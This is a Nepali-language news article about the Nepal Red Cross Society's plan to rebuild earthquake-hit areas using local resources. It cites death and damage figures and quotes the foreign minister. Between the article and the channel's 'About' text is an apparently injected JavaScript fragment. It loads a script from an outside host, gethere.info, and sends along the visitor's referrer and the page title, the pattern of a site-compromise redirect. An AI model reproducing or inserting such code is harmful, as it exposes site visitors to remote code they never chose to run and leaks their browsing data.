महेन्द्र पाण्डे

admin Avatar

नवीय सहायतामा कार्यरत नेपाल रेडक्रस सोसाइटीले स्थानीय स्रोत साधनलाई नै अधिकतम उपयोग गरी भूकम्प प्रभावित क्षेत्रको पुनःनिर्माण तथा पुनःस्थापनामा सघाउने नीति अगाडि सारेको छ। भूकम्पको खोज, उद्धार तथा पहिलो चरणको राहत कार्य सम्पन्न भइसकेको भन्दै उसले आगामी दिनमा स्थानीय स्रोत साधनलाई उपयोग गर्ने गरी पुनःनिर्माणका कार्ययोजना अगाडि सारेको हो। कार्ययोजनालाई अन्तिम रुप दिन शुक्रबार काठमाडौमा आयोजित कार्यक्रममा अन्तराष्ट्रिय रेडक्रस सोसाइटी महासङ्घको आर्थिक एवम् प्राविधिक सहयोगमा सोसाइटीले ती कार्य तत्काल सुरु गर्ने जनाएको छ।

ती दिनका भूकम्पले हालसम्म आठ हजार ७ सय ७३ जनाको मृत्यु, पाँचलाख ४२ हजार ६ सय ३० घर पूर्ण क्षति, तीनलाख आठ हजार १ सय १७ घर आंशिक क्षति तथा करिब रु दश अर्ब बराबरको भौतिक क्षति पुगेको आँकडा छ। कार्यक्रममा परराष्ट्र मन्त्री महेन्द्रबहादुर पाण्डेले स्थानीय स्रोत, सीप साधनलाई नै अधिकतम उपयोग गरी पुनःनिर्माण तथा पुनःस्थापनाका कार्यक्रम अगाडि बढाउन आवश्यक रहेको बताउनुभयो। उहाँले आगामी असार १० गते आयोजना हुने दाता सम्मेलनको तयारी तीव्ररुपमा भइरहेको जानकारी दिँदै सरकारले अहिले राहत वितरणका साथ पुनःनिर्माणका लागि क्षति आँकलन गरिराखेको बताउनुभयो। अन्तराष्ट्रिय रेडक्रस सोसाइटीको एसिया प्रशान्त क्षेत्रका निर्देशक जगन चापागाईंले समुदायमा आधारित रही भूकम्प प्रभावित क्षेत्रको पुनःनिर्माण तथा पुनःस्थापनाका कार्यक्रम सञ्चालन हुने जानकारी दिनुभयो।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories